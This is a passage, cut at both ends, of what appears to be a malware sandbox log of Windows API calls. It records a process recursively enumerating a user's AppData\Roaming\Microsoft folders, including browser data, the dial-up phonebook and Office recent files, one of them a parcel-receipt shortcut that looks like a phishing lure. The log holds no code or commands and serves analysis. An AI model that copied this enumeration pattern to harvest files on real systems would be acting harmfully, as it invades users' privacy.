(pszFile="Visio 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Windows Explorer (2).lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Windows Explorer.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Windows Media Player (2).lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Windows Media Player.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.614] PathMatchSpecW (pszFile="Word 2016.lnk", pszSpec="*") returned 1 [0083.614] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.614] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.615] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.615] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.615] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.615] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0083.615] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0083.615] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.615] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.615] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0083.615] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0083.615] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.615] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.615] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="356BZ594" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594" [0083.615] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*" [0083.615] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\356BZ594\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.615] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.615] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.615] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.615] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="N4CF7XJW" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW" [0083.615] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*" [0083.615] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\N4CF7XJW\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.615] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.615] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.616] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.616] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="WIK9MYAA" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA" [0083.616] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*" [0083.616] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\WIK9MYAA\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.616] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.616] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.616] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="ZE5P2FRT" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT" [0083.616] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*" [0083.616] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\ZE5P2FRT\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.616] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.616] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.616] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.616] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.616] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.616] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC" [0083.616] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0083.616] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.616] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.616] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.616] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.616] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="MS Project" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project" [0083.617] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0083.617] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.617] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.617] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project", pszFile="16" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16" [0083.617] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*" [0083.617] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.617] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.617] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16", pszFile="en-US" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US" [0083.617] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*" [0083.617] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\MS Project\\16\\en-US\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.617] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.617] PathMatchSpecW (pszFile="Global.MPT", pszSpec="*") returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.617] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.617] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.617] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.617] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network" [0083.617] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*" [0083.617] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.617] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.617] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.617] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0083.617] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0083.617] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.617] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 1 [0083.618] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0083.618] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0083.618] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0x586c20 [0083.618] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 1 [0083.618] PathCombineW (in: pszDest=0x18d298, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0083.618] PathCombineW (in: pszDest=0x18ce10, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0083.618] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0x586c60 [0083.618] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 1 [0083.618] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586c60, lpFindFileData=0x18cbc0 | out: lpFindFileData=0x18cbc0) returned 0 [0083.618] FindClose (in: hFindFile=0x586c60 | out: hFindFile=0x586c60) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586c20, lpFindFileData=0x18d048 | out: lpFindFileData=0x18d048) returned 0 [0083.618] FindClose (in: hFindFile=0x586c20 | out: hFindFile=0x586c20) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586be0, lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0 [0083.618] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0 [0083.618] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586b60, lpFindFileData=0x18dde0 | out: lpFindFileData=0x18dde0) returned 1 [0083.618] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Office" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office" [0083.618] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*" [0083.618] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.618] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.618] FindNextFileW (in: hFindFile=0x586ba0, lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 1 [0083.618] PathMatchSpecW (pszFile="MSO1033.acl", pszSpec="*") returned 1 [0083.618] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office", pszFile="Recent" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent" [0083.618] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*" [0083.618] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Office\\Recent\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.619] PathMatchSpecW (pszFile="Database1.LNK", pszSpec="*") returned 1 [0083.619] PathMatchSpecW (pszFile="Global.LNK", pszSpec="*") returned 1 [0083.619] PathMatchSpecW (pszFile="index.dat", pszSpec="*") returned 1 [0083.619] PathMatchSpecW (pszFile="My Documents.LNK", pszSpec="*") returned 1 [0083.619] PathMatchSpecW (pszFile="receipt-parcel-UK980-456.LNK", pszSpec="*") returned 1 [0083.619] PathMatchSpecW (pszFile="Templates.LNK", pszSpec="*") returned 1 [0083.619] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.619] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.620] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="OneNote" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote" [0083.620] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*" [0083.620] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\*", lpFindFileData=0x18d958 | out: lpFindFileData=0x18d958) returned 0x586ba0 [0083.620] PathCombineW (in: pszDest=0x18dba8, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote", pszFile="16.0" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0" [0083.620] PathCombineW (in: pszDest=0x18d720, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0", pszFile="*" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*" [0083.620] FindFirstFileW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\OneNote\\16.0\\*", lpFindFileData=0x18d4d0 | out: lpFindFileData=0x18d4d0) returned 0x586be0 [0083.620] PathMatchSpecW (pszFile="Preferences.dat", pszSpec="*") returned 1 [0083.620] FindClose (in: hFindFile=0x586be0 | out: hFindFile=0x586be0) returned 1 [0083.620] FindClose (in: hFindFile=0x586ba0 | out: hFindFile=0x586ba0) returned 1 [0083.620] PathCombineW (in: pszDest=0x18e030, pszDir="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft", pszFile="Outlook" | out: pszDest="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook") returned="C:\\Users\\aETAdzjz\\AppData\\Roaming\\Microsoft\\Outlook" [0083.620] PathCombineW (in: pszDest=0x18dba8, 